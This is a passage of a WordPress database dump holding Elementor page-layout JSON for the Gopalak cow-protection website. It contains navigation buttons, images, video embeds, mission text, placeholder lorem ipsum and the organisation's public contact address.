here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9869,1657,'_elementor_page_assets','a:0:{}'),(9882,1659,'_elementor_edit_mode','builder'),(9883,1659,'_elementor_template_type','wp-page'),(9884,1659,'_elementor_version','3.7.8'),(9885,1659,'_wp_page_template','elementor_canvas'),(9886,1659,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"0\",\"bottom\":\"174\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9887,1659,'_elementor_page_assets','a:0:{}'),(9889,1660,'_elementor_edit_mode','builder'),(9890,1660,'_elementor_template_type','wp-page'),(9891,1660,'_elementor_version','3.7.8'),(9892,1660,'_wp_page_template','elementor_canvas'),(9893,1660,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"0\",\"bottom\":\"174\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\"